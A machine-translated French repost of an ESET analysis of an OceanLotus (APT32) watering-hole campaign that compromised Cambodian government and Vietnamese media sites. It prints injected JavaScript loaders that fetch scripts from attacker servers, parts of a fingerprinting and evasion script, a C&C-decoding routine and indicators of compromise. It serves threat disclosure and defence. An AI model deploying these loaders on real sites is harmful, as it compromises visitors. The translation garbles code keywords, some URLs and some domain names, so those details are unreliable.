
OceanLotus: nouvelle attaque de points d'eau en Asie du Sud-Est – Serveur d’impression
Les chercheurs d'ESET ont identifié 21 sites Web distincts qui avaient été compromis, notamment des sites gouvernementaux et médiatiques particulièrement remarquables.
Les chercheurs de ESET ont découvert une nouvelle campagne de points d’arrosage ciblant plusieurs sites Web en Asie du Sud-Est et qui aurait été active depuis septembre 2018. Cette campagne se distingue par son ampleur, car nous avons pu identifier 21 sites Web compromis, dont certains qui sont particulièrement remarquables. Parmi les sites Web compromis figuraient le ministère de la Défense du Cambodge, le ministère des Affaires étrangères et de la Coopération internationale du Cambodge et plusieurs sites Web de journaux ou de blogs vietnamiens.
Après une analyse approfondie, nous sommes convaincus que cette campagne est menée par le groupe OceanLotus. [1], également appelé APT32 [2] et APT-C-00. OceanLotus est un groupe d'espionnage actif depuis au moins 2012 [3], principalement intéressé par les gouvernements étrangers et les dissidents.
Cette campagne serait une évolution de ce que les chercheurs de Volexity ont appelé OceanLotus Framework B, un système de points d’eau qu’ils ont documenté en 2017. [4]. Cependant, les attaquants ont intensifié leur jeu pour compliquer et ralentir l'analyse de leur infrastructure malveillante. Parmi les différentes améliorations, ils ont commencé à utiliser la cryptographie à clé publique pour échanger une clé de session AES, utilisée pour chiffrer d'autres communications, empêchant ainsi les produits de sécurité d'intercepter la charge finale. Ils sont également passés de HTTP à WebSocket pour masquer leurs communications malveillantes.
Les chercheurs d'ESET ont identifié 21 sites Web distincts qui avaient été compromis, chacun étant redirigé vers un domaine distinct contrôlé par les attaquants.
La figure 1 montre la région ciblée par cette campagne.

Figure 1 – Emplacement des sites Web compromis
La plupart des domaines compromis sont liés aux médias ou au gouvernement cambodgien. Le tableau suivant détaille les différentes victimes. Nous les avons tous informés en octobre, mais la plupart d'entre eux sont encore en train d'injecter des scripts malveillants au moment de la rédaction, deux mois après le premier compromis. Ainsi, nous vous encourageons ne pas visiter ces sites.
Domaine compromis | La description |
---|---|
baotgm[.]net | Média en vietnamien (basé à Arlington, Texas) |
cnrp7[.]org | Cambodge National Rescue Party |
conggiaovietnam[.]net | En rapport avec la religion – en vietnamien |
daichungvienvinhthanh[.]com | En rapport avec la religion – en vietnamien |
danchimviet[.]Info | Médias en vietnamien |
danviet[.]vn | Médias en vietnamien |
Danviethouston[.]com | Médias en vietnamien |
fvpoc[.]org | Anciens prisonniers d'opinion vietnamiens |
club de jardinage[.]com | Club de golf à Phnom Penh, Royaume du Cambodge |
lienketqnhn[.]org | Médias en vietnamien |
mfaic.gov[.]kh | Ministère des affaires étrangères et de la coopération internationale du Cambodge |
mod.gov[.]kh | Ministère de la Défense du Cambodge |
mtgvinh[.]net | En rapport avec la religion – en vietnamien |
nguoitieudung.com[.]vn | Médias en vietnamien |
phnompenhpost[.]com | Journal cambodgien en anglais |
raovatcalitoday[.]com | Inconnu – En vietnamien |
thongtinchongphandong[.]com | Médias de l'opposition en vietnamien |
tinkhongle[.]com | Médias en vietnamien |
toithichdoc.blogspot[.]com | Blog en vietnamien |
trieudaiviet[.]com | Inconnu – En vietnamien |
triviet[.]nouvelles | Médias en vietnamien |
Tableau 1 – Description des sites Web compromis
En règle générale, lors d’une attaque à l’eau vive, les adversaires compromettent des sites Web régulièrement visités par des cibles potentielles. Cependant, lors de cette attaque, OceanLotus a également été en mesure de compromettre certains sites Web qui attirent un grand nombre de visiteurs en général, et pas seulement leurs cibles présumées. Le tableau ci-dessous présente le rang Alexa au moment de la rédaction (plus le rang est bas, plus il est fréquenté) des sites Web compromis. Par exemple, ils ont compromis le site Web du journal Dan Viet (danviet[.]vn), qui est le 116th site le plus visité au Vietnam.
Domaine | Rang Alexa (global) | Rang Alexa (dans le pays le plus populaire) |
---|---|---|
danviet[.]vn | 12 887 | 116 |
phnompenhpost[.]com | 85 910 | 18 880 |
nguoitieudung.com[.]vn | 261 801 | 2 397 |
danchimviet[.]Info | 287,852 | 144 884 |
baotgm[.]net | 675,669 | 119 737 |
toithichdoc.blogspot[.]com | 700 470 | 11 532 |
mfaic.gov[.]kh | 978,165 | 2 149 |
conggiaovietnam[.]net | 1 040 548 | 15 368 |
thongtinchongphandong[.]com | 1 134 691 | 21 575 |
tinkhongle[.]com | 1 301 722 | 15 224 |
daichungvienvinhthanh[.]com | 1 778 418 | 23 428 |
triviet[.]nouvelles | 2 767 289 | Indisponible |
mod.gov[.]kh | 4 247 649 | 3 719 |
raovatcalitoday[.]com | 8.180.358 | Indisponible |
cnrp7[.]org | 8 411 693 | Indisponible |
mtgvinh[.]net | 8,415,468 | Indisponible |
Danviethouston[.]com | 8 777 564 | Indisponible |
lienketqnhn[.]org | 16 109 635 | Indisponible |
club de jardinage[.]com | 16 109 635 | Indisponible |
trieudaiviet[.]com | 16 969 048 | Indisponible |
fvpoc[.]org | Indisponible | Indisponible |
Tableau 2 – Rang Alexa des sites Web compromis
Le mode de fonctionnement est similaire sur tous les sites Web compromis. Les attaquants ajoutent un petit morceau de code JavaScript dans la page d'index ou dans un fichier JavaScript hébergé sur le même serveur. Le morceau de code de la figure 2, légèrement obscurci, charge ensuite un autre script à partir d'un serveur contrôlé par les attaquants. Le code suivant, ajouté dans https://www.mfaic.gov[.]kh / wp-content / themes / ministère des affaires étrangères / slick / slick.min.js, chargera le fichier de https: //weblink.selfip[.]info / images / cdn.js? from = maxcdn.
(une fonction()
var pt = "http";
var l = document.createElement ('script');
l.src = pt + "s: //" + arguments[0] + arguments[2] + arguments[3] + 'ip.' + 'info / images / cdn.js? from = maxcdn';
document.getElementsByTagName ('body')[0].appendChild (l)
) ('web', 'a', 'link', '.self');
(une fonction() var pt = "http"; var l = document.createElement('scénario'); l.src = pt + "s: //" + arguments[[[[0] + arguments[[[[2] + arguments[[[[3] + 'ip.' + 'info / images / cdn.js? from = maxcdn'; document.getElementsByTagName('corps')[[[[0].appendChild(l) )('web', 'une', 'lien', '.soi'); |
Figure 2 – Morceau de code JavaScript ajouté à mfaic.gov[.]kh
Pour échapper à la détection, ils prennent les mesures suivantes:
- Ils masquent les scripts pour empêcher l'extraction statique de l'URL finale.
- L'URL ressemble à une véritable bibliothèque JavaScript utilisée par le site Web.
- Ils utilisent un domaine et un URI différents par site Web compromis.
- Le script est différent pour chaque site Web compromis. Le code suivant est le script inséré dans un autre site Web compromis:
var script = document.createElement ("script");
var i = 'crash-course';
var s = "fzgbc saitztall znfo";
var _ = '/';
var e = "VisitorIdentification.js? sa =" + i;
script.async = true;
script.src = "http://www.welivesecurity.com/htt" + "ps:" + _ + _ + s.split ("") .map (x => x.replace ("z", "i ")). join (". ") + _ + e;
var doc = document.getElementsByTagName ('script')[0];
doc.parentNode.insertBefore (script, doc);
var scénario = document.createElement("scénario"); var je = «cours intensif»; var s = "fzgbc saitztall znfo"; var _ = '/'; var e = "VisitorIdentification.js? Sa =" + je; scénario.async = vrai; scénario.src = "http://www.welivesecurity.com/htt" + "ps:" + _ + _ + s.Divisé("").carte(X => X.remplacer("z", "je")).joindre(".") + _ + e; var doc = document.getElementsByTagName('scénario')[[[[0]; doc.parentNode.insérerAvant(scénario, doc); |
Figure 3 – Un autre morceau de JavaScript inséré dans un site Web ciblé
Sommaire
Première étape
En fonction de l'emplacement de l'adresse IP du visiteur, le serveur de la première étape, par ex. weblink.selfip[.]info pour mfaic.gov[.]kh, fournit un script leurre (une bibliothèque JavaScript légitime et aléatoire) ou le script de première étape (SHA-1: 2194271C7991D60AE82436129D7F25C0A689050A, par exemple). Tous les serveurs ne disposent pas d'un contrôle d'emplacement, mais lorsqu'il est activé, seuls les visiteurs du Vietnam et du Cambodge reçoivent le script malveillant.
Le script de la première étape contient plusieurs contrôles pour échapper à la détection, comme illustré à la figure 4.
fonction t (n)
var r = this;
! function (t, n)
si (! (t instanceof n))
throw new TypeError ('Impossible d'appeler une classe en tant que fonction');
(this, t), this.t =
o: null,
s:! 0
, this.scr =! 0, this.r (), this.i =! 0, window.addEventListener ('scroll', fonction () );
retourne t.prototype.r = function ()
var t = this;
setInterval (function () r)? (t.t. =! 1, t.t.o = null): (t.t.s =! 0, t.o.e = e);
, 500);
[…]
1 2 3 4 5 6 7 8 9 dix 11 12 13 14 15 16 17 18 19 20 21 |
[[[[…] une fonction t(n) var r = cette; !une fonction (t, n) si (!(t exemple de n)) jeter Nouveau Erreur-type('Impossible d'appeler une classe en tant que fonction'); (cette, t), cette.t = o: nul, s: !0 , cette.scr = !0, cette.r(), cette.je = !0, fenêtre.addEventListener('faire défiler', une fonction () r.scr && !r.t.s && (r.scr = !1, r.c(n)), r.je = !1; );
revenir t.prototype.r = une fonction () var t = cette; setInterval(une fonction () var n = fenêtre.largeur extérieure – fenêtre.largeur intérieure > 160, r = fenêtre.outerHeight – fenêtre.taille intérieure > 160, e = n ? 'verticale' : 'horizontal'; r && n , 500);
[[[[…] |
Figure 4 – Charge utile JavaScript de la première étape
Le script attendra que la victime défile sur la page. Il vérifie également la résolution de la fenêtre et détermine si Firebug, une extension de navigateur utilisée pour analyser des pages Web, est activé. Si l'une des vérifications échoue, l'exécution est interrompue.
Ensuite, il déchiffre le domaine Command & Control à l'aide d'un algorithme personnalisé. Par exemple, 3B37371M1B1B382R332V1A382W36392W2T362T1A322T38 sera déchiffré à wss: //tcog.thruhere[.]net. Pour chaque domaine de premier étage, les attaquants enregistrent également un domaine de deuxième étage différent, chacun hébergé sur un serveur différent. Le code de la figure 5 est un équivalent, en Python, de la fonction de déchiffrement.
def decrypt (encrypted_url):
s = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
return "" .join (chr (s.index (encrypted_url[e]) * 36 + s.index (encrypted_url[e+1])) pour e dans la plage (0, len (encrypted_url), 2))
def décrypter(encrypted_url): s = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" revenir "".joindre(chr(s.indice(encrypted_url[[[[e]) * 36 + s.indice(encrypted_url[[[[e+1])) pour e dans intervalle(0,len(encrypted_url),2)) |
Figure 5 – Code Python pour décrypter les serveurs C & C
Une fois l'adresse C & C déchiffrée, le script envoie une chaîne unique de 15 chiffres, puis reçoit et exécute un script de deuxième étape. Toutes les communications sont effectuées via WebSocket sur SSL. Ce protocole permet une communication en duplex intégral entre un client et un serveur. Cela signifie que, une fois que le client établit une connexion, un serveur peut envoyer des données au client même si le client n'a pas envoyé de demande. Cependant, dans ce cas particulier, l’utilisation des sockets Web semble avoir pour principal objectif d’éviter la détection.
Deuxième étape
Le script de deuxième étape est en fait un script de reconnaissance. Les développeurs OceanLotus ont réutilisé la bibliothèque fingerprintjs2 de Valve, disponible sur GitHub, en la modifiant légèrement afin d’ajouter une communication réseau et un rapport personnalisé.
La figure 6 décrit les différentes actions exécutées par le script. Toutes les communications passent par la session WebSocket ouverte par la première étape.

Figure 6 – Flux de la charge utile de la deuxième étape
La communication est cryptée à l'aide d'une clé de session AES, générée par le serveur. Il est crypté avec une clé publique RSA 1024 bits et envoyé au client. Ainsi, il n'est pas possible de décrypter les communications entre le client et le serveur.
En comparaison avec les précédentes itérations de leur structure de points d’arrosage, cela rendra les choses beaucoup plus difficiles pour les défenseurs, car les données envoyées sur le réseau ne peuvent pas être détectées puis déchiffrées. Cela empêchera la détection réseau des données. La clé publique envoyée par le serveur est toujours la même et est disponible dans la section IoC.
Ce script de reconnaissance crée un rapport, semblable à celui présenté ci-dessous, et l'envoie au serveur C & C de deuxième étape.
{
"histoire":
"client_title": "Ministry% 20of% 20Forign% 20Affairs% 20and% 20International% 20Cooperation% 20-",
"client_url": "https://www.mfaic.gov.kh/",
"client_cookie": "",
"client_hash": "",
"client_referrer": "https://www.mfaic.gov.kh/foreign-ngos",
"client_platform_ua": "Mozilla / 5.0 (Windows NT 6.1; Win64; x64) AppleWebKit / 537.36 (KHTML, comme Gecko) Chrome / 68.0.3440.106 Safari / 537.36",
"client_time": "2018-10-21T12: 43: 25.254Z",
"fuseau horaire": "Asie / Bangkok",
"client_network_ip_list": [
« 192.168.x.x »,
« x.x.x.x »
],
"client_api": "wss: //tcog.thruhere.net/",
"client_zuuid": "defaultcommunications39e10c84a0546508c58d48ae56ab7c7eca768183e640a1ebbb0cceaef0bd07cedefaultcommunications9360af458bb80c43fd1f73190b80b80bc6d45
"client_uuid": "a612cdb028e1571dcab18e4aa316da26"
,
"navigateur": {
"plugins":
"activex": false,
"cors": vrai,
"flash": faux,
"java": faux,
"foxit": vrai,
"phonegap": faux,
"quicktime": faux,
"realplayer": faux,
"silverlight": faux,
"touch": faux,
"vbscript": false,
"vlc": false,
"webrtc": true,
"wmp": false
,
"_écran":
"largeur": 1920,
"hauteur": 1080,
"availWidth": 1920,
"availHeight": 1080,
"résolution": "1920×1080"
,
"_plugins": [
[…]
1 2 3 4 5 6 7 8 9 dix 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
{ "histoire": "client_title": "Ministère% 20de% 20Freign% 20Affaires% 20et% 20International% 20Coopération% 20-", "client_url": "https://www.mfaic.gov.kh/", "client_cookie": "", "client_hash": "", "client_referrer": "https://www.mfaic.gov.kh/foreign-ngos", "client_platform_ua": "Mozilla / 5.0 (Windows NT 6.1; Win64; x64) AppleWebKit / 537.36 (KHTML, comme Gecko) Chrome / 68.0.3440.106 Safari / 537.36", "client_time": "2018-10-21T12: 43: 25.254Z", "fuseau horaire": "Asie / Bangkok", "client_network_ip_list": [[[[ "192.168.x.x", "x.x.x.x" ], "client_api": "wss: //tcog.thruhere.net/", "client_zuuid": "defaultcommunications39e10c84a0546508c58d48ae56ab7c7eca768183e640a1ebbb0cceaef0bd07cedfaunefautfecommunication9360af458bb80c43fd1f73190b80dbfb0b27bcbbbbbbbbbbbbbbbbbbbbbbbcc0f0bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbcc, "client_uuid": "a612cdb028e1571dcab18e4aa316da26" , "navigateur": { "plugins": "activex": faux, "cors": vrai, "flash": faux, "Java": faux, "foxit": vrai, "phonegap": faux, "Quick Time": faux, "vrai joueur": faux, "silverlight": faux, "toucher": faux, "vbscript": faux, "vlc": faux, "webrtc": vrai, "wmp": faux , "_écran": "largeur": 1920, "la taille": 1080, "availWidth": 1920, "availHeight": 1080, "résolution": "1920×1080" , "_plugins": [[[[ [[[[...] |
Figure 7 – Rapport d'empreinte digitale
Ce rapport est presque identique au rapport généré par OceanLotus Framework B, documenté par les chercheurs de Volexity en 2017. Les différentes sections sont similaires et incluent des fautes de frappe identiques. Grâce à ces similitudes et à la localisation des cibles, nous sommes confiants que OceanLotus dirigera cette campagne.
Le rapport généré contient des informations détaillées sur le navigateur de la victime et le site Web visité: l’agent utilisateur, le référent HTTP, les adresses IP locale et externe, le navigateur ajoute les préférences de langue configurées du navigateur.
De plus, il y a deux identifiants uniques par machine, appelés client_zuuid et client_uuid. Ils sont probablement utilisés pour identifier les utilisateurs et les suivre d'une visite à l'autre. En réalité, ces identifiants étaient déjà présents dans la version 2017 du framework et client_uuid a été calculé de manière similaire.
le client_zuuid est la concaténation des différentes valeurs deviceId contenues dans navigator.mediaDevices.enumerateDevices. Les périphériques sont les périphériques externes accessibles au navigateur, tels que les caméras ou les microphones. Ainsi, cette valeur doit être la même pour un utilisateur donné lors de ses différentes visites à partir du même ordinateur.
le client_uuid est un hachage MD5 de certaines informations d’empreintes digitales extraites par fingerprintjs2. Parmi les informations collectées figurent l'agent utilisateur du navigateur, la langue, le fuseau horaire, les plug-ins du navigateur et les polices disponibles dans le navigateur. Là encore, cette valeur doit être identique pour toutes les visites, sauf si, par exemple, l'utilisateur met à jour le navigateur ou utilise un périphérique différent.
Enfin, le serveur peut envoyer du code JavaScript supplémentaire à l'ordinateur victime, probablement la charge réelle. Malheureusement, en raison de l'utilisation d'une clé de session AES pour chiffrer les communications, nous n'avons pas été en mesure d'identifier des exemples dans la nature de charges utiles envoyées par les attaquants. De plus, les charges utiles ne sont livrées qu'à des cibles spécifiques. Ainsi, il n'était pas possible de les obtenir en utilisant une machine de test. Toutefois, selon des rapports antérieurs, ces campagnes de points d’arrosage d’OceanLotus ont pour objectif de phish ses victimes. Par exemple, Volexity a signalé qu’une fenêtre contextuelle demandant aux utilisateurs d’approuver l’accès OAuth au compte Google de la victime pour une application Google OceanLotus était affichée. En utilisant cette technique, les attaquants peuvent accéder aux contacts et aux courriels de la victime.
Afin d'être le plus furtif possible, les opérateurs OceanLotus ont enregistré un domaine de premier et un deuxième domaines par site Web compromis. Chaque domaine est hébergé sur un serveur distinct avec une adresse IP distincte. Ils ont enregistré au moins 50 domaines et 50 serveurs pour cette campagne.
Bien que la plupart des domaines de la première étape aient été enregistrés sur des services de noms de domaine gratuits, la plupart des domaines de la deuxième étape sont des noms de domaine payants. Ils imitent également les sites Web authentiques afin de paraître légitimes. Le tableau 3 montre certains services imités par les attaquants.
Domaine C & C | Domaine légitime |
---|---|
cdn-ampproject[.]com | cdn.ampproject.com |
bootstraplink [.]com | getbootstrap.com |
sskimresources[.]com | s.skimresources.com |
widgets-wp[.]com | widgets.wp.com |
Tableau 3 – Sites Web légitimes imités par les attaquants
Le nombre de domaines utilisés et leur similarité avec les sites Web légitimes les rendent probablement plus difficiles à détecter par un œil humain regardant le trafic réseau.
Malgré le suivi actif de nombreux chercheurs, le groupe OceanLotus est toujours très occupé à attaquer des cibles en Asie du Sud-Est. Ils améliorent également régulièrement leur ensemble d’outils, y compris leur infrastructure de points d’arrosage et leurs programmes malveillants Windows et MacOS. Les mises à jour récentes apportées à la structure de points d’arrosage, décrites dans ce blog, témoignent d’un niveau de sophistication sans précédent pour OceanLotus. Ceci est un autre rappel que ce groupe APT doit être suivi de près.
Afin de limiter le nombre de victimes, nous avons averti chaque propriétaire de site Web compromis et expliqué comment supprimer le code JavaScript malveillant, bien que certains semblent très réticents à être informés ou aidés.
Les chercheurs de ESET continueront à suivre tout développement de l'ensemble d'outils OceanLotus. Des indicateurs de compromis peuvent également être trouvés sur GitHub. Pour toute demande de renseignements ou pour soumettre des échantillons de sujets liés au sujet, contactez-nous à l'adresse suivante :umpintel@eset.com.
[1] ESET Research, «OceanLotus: techniques anciennes, nouvelle porte dérobée», 03 2018. [Online]. Disponible à l'adresse suivante: https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf.
[2] N. Carr, «Le cyberespionnage se porte bien: APT32 et la menace pour les entreprises mondiales», FireEye, 14.05.2017. [Online]. Disponible à l’adresse: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html.
[3] Sky Eye Lab, «Résumé du rapport OceanLotus APT», 29 05 2015. [Online]. Disponible à l'adresse suivante: http://blogs.360.cn/post/oceanlotus-apt.html.
[4] S. K. S. Dave Lassalle, «OceanLotus Blossoms: surveillance numérique massive et attaques ciblant l'ANASE, les nations asiatiques, les médias, les groupes de défense des droits humains et la société civile», Volexity, 06-11 2017. [Online]. Disponible: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and- société civile/.
Indicateurs de compromis (IoC)
Des dossiers
La description | SHA-1 | SHA-256 | Nom de la détection |
---|---|---|---|
Script de première étape | 2194271C7991D60AE82436129D7F25C0A689050A | 1EDA0DE280713470878C399D3FB6C331BA0FADD0BD9802ED98AE06218A17F3F7 | JS / Agent.NYQ |
Scénario de deuxième étape | 996D0AC930D2CDB16EF96EDC27D9D1AFC2D89CA8 | 8B824BE52DE7A8723124BAD5A45664C574D6E905F300C35719F1E6988887BD62 | JS / Agent.NYR |
Réseau IoC
Site compromis | 1ère étape | adresse IP | 2ème étape | adresse IP |
---|---|---|---|---|
baotgm[.]net | arabica.podzone[.]net | 178.128.103.24 | 10cm.mypets[.]ws | 178.128.100.189 |
cnrp7[.]org | utagscript[.]com | 206.189.88.50 | optnmstri[.]com | 159.65.134.146 |
conggiaovietnam[.]net | lcontacts.servebbs[.]net | 178.128.219.207 | imgincapsula[.]com | 209.97.164.158 |
daichungvienvinhthanh[.]com | sskimresources[.]com | 178.128.90.102 | secure-imrworldwide[.]com | 178.128.90.109 |
danchimviet[.]Info | wfpscripts.homeunix[.]com | 178.128.223.102 | cdn-ampproject[.]com | 178.128.24.201 |
danviet[.]vn | cdnscr.thruhere[.]net | 178.128.98.139 | io.blogsite[.]org | 178.128.98.89 |
Danviethouston[.]com | votre-ip.getmyip[.]com | 178.128.103.74 | [Unknown] | [Unknown] |
fvpoc[.]org | gui.dnsdojo[.]net | 178.128.28.93 | cnnazure[.]com | 209.97.164.96 |
club de jardinage[.]com | figbc.knowsitall[.]Info | 178.128.103.207 | ichefbcci.is-a-chef[.]com | 206.189.85.162 |
lienketqnhn[.]org | conseils-renouveler.webhop[.]Info | 159.65.7.45 | cyhire.cechire[.]com | 178.128.103.79 |
mfaic.gov[.]kh | weblink.selfip[.]Info | 178.128.103.202 | tcog.thruhere[.]net | 178.128.107.83 |
mfaic.gov[.]kh | s0-2mdn[.]net | 104.248.144.178 | p-typekit[.]com | 104.248.144.136 |
mod.gov[.]kh | static.tagscdn[.]com | 206.189.95.214 | pagefairjs[.]com | 159.65.137.109 |
mtgvinh[.]net | metacachecdn[.]com | 178.128.209.153 | bootstraplink[.]com | 159.65.129.241 |
nguoitieudung.com[.]vn | s-adroll[.]com | 128.199.159.127 | joueur-cnevids[.]com | 128.199.159.60 |
phnompenhpost[.]com | tiwimg[.]com | 206.189.89.121 | tiqqcdn[.]com | 206.189.47.116 |
raovatcalitoday[.]com | widgets-wp[.]com | 178.128.90.107 | cdn-tynt[.]com | 142.93.75.192 |
thongtinchongphandong[.]com | lb-web-stat[.]com | 159.65.128.57 | benchtag2[.]com | 178.128.90.108 |
tinkhongle[.]com | cdn1.shacknet[.]nous | 142.93.127.120 | scdn-cxense[.]com | 142.93.75.161 |
toithichdoc.blogspot[.]com | assets-cdn.blogdns[.]net | 178.128.28.89 | cart.gotdns[.]com | 206.189.145.242 |
trieudaiviet[.]com | html5.endofinternet[.]net | 178.128.90.182 | effeto-azur[.]net | 142.93.71.92 |
triviet[.]nouvelles | ds-aksb-a.likescandy[.]com | 159.65.137.144 | labs-apnic[.]net | 178.128.90.138 |
[Unknown] | pixel1.dnsalias[.]net | 142.93.116.157 | ad-appier[.]com | 178.128.90.66 |
[Unknown] | trc.webhop[.]net | 178.128.90.223 | statique-addtoany[.]com | 142.93.75.172 |
[Unknown] | nav.neat-url[.]com | 178.128.103.205 | straits-times.is-an-actor[.]com | 178.128.107.24 |
Clé publique RSA envoyée par le serveur
—–BEGIN PUBLIC KEY—–
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDI8O2kXpKec4MBVeF2g86GtT2X
/ ABJB2M + urEvxJStRuL / + u / a9oJ6XL4JTFceYqJiSsXvwD / wDfgI00zCdmJ7xgw +
rpGyuSntLH2Ox5oVxTTUQB791WJByDjtKXYBHpIBrmePG1EcnTlfBhgHhpAeZEao
hEXZ94it73j02h + JtQIDAQAB
—–END PUBLIC KEY—–
Matthieu Faou
Commentaires
Laisser un commentaire